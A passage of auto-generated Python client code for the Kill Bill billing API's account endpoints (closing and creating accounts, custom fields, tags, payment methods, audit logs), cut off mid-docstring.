all_params = ['account_id', 'created_by', 'cancel_all_subscriptions', 'write_off_unpaid_invoices', 'item_adjust_unpaid_invoices', 'remove_future_notifications', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method close_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `close_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `close_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `close_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'cancel_all_subscriptions' in params:
query_params.append(('cancelAllSubscriptions', params['cancel_all_subscriptions'])) # noqa: E501
if 'write_off_unpaid_invoices' in params:
query_params.append(('writeOffUnpaidInvoices', params['write_off_unpaid_invoices'])) # noqa: E501
if 'item_adjust_unpaid_invoices' in params:
query_params.append(('itemAdjustUnpaidInvoices', params['item_adjust_unpaid_invoices'])) # noqa: E501
if 'remove_future_notifications' in params:
query_params.append(('removeFutureNotifications', params['remove_future_notifications'])) # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account(self, body=None, created_by=None, **kwargs): # noqa: E501
"""Create account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account(body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Account body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_with_http_info(body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_with_http_info(body, created_by, **kwargs) # noqa: E501
return data
def create_account_with_http_info(self, body=None, created_by=None, **kwargs): # noqa: E501
"""Create account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_with_http_info(body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Account body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_custom_fields(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_custom_fields(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_custom_fields_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_account_custom_fields_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add custom fields to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_custom_fields_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[CustomField] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_account_custom_fields`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_tags(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add tags to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_tags(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_account_tags_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_account_tags_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_account_tags_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add tags to account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_account_tags_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_account_tags`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_account_tags`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_payment_method(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add a payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_payment_method(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentMethod body: (required)
:param Str created_by: (required)
:param Bool is_default:
:param Bool pay_all_unpaid_invoices:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: PaymentMethod
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_payment_method_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.create_payment_method_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def create_payment_method_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add a payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_payment_method_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentMethod body: (required)
:param Str created_by: (required)
:param Bool is_default:
:param Bool pay_all_unpaid_invoices:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: PaymentMethod
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'is_default', 'pay_all_unpaid_invoices', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_payment_method" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `create_payment_method`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_payment_method`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `create_payment_method`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `create_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'is_default' in params:
query_params.append(('isDefault', params['is_default'])) # noqa: E501
if 'pay_all_unpaid_invoices' in params:
query_params.append(('payAllUnpaidInvoices', params['pay_all_unpaid_invoices'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaymentMethod', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_custom_fields(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove custom fields from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_custom_fields(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] custom_field:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_account_custom_fields_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.delete_account_custom_fields_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def delete_account_custom_fields_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove custom fields from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_custom_fields_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] custom_field:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'custom_field', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_custom_fields`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `delete_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `delete_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'custom_field' in params:
query_params.append(('customField', params['custom_field'])) # noqa: E501
collection_formats['customField'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_tags(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove tags from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_tags(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] tag_def:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_account_tags_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.delete_account_tags_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def delete_account_tags_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Remove tags from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_account_tags_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param List[Str] tag_def:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'tag_def', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_tags`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `delete_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `delete_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'tag_def' in params:
query_params.append(('tagDef', params['tag_def'])) # noqa: E501
collection_formats['tagDef'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_audit_logs(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve audit logs by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_audit_logs_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_audit_logs_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_audit_logs_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve audit logs by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_audit_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_audit_logs`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_audit_logs`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/auditLogs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_audit_logs_with_history(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account audit logs with history by account id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_history(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_audit_logs_with_history_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_audit_logs_with_history_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_audit_logs_with_history_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account audit logs with history by account id # noqa: E501
# noqa: E501
